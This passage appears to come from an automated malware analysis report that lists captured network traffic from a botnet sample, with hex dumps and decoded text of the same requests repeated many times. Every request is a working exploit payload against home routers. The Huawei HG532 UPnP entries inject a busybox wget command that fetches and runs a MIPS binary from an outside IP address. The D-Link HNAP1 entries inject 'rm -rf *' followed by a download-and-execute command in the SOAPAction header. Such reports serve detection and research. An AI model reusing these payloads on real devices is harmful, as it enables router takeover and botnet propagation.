65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 482Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 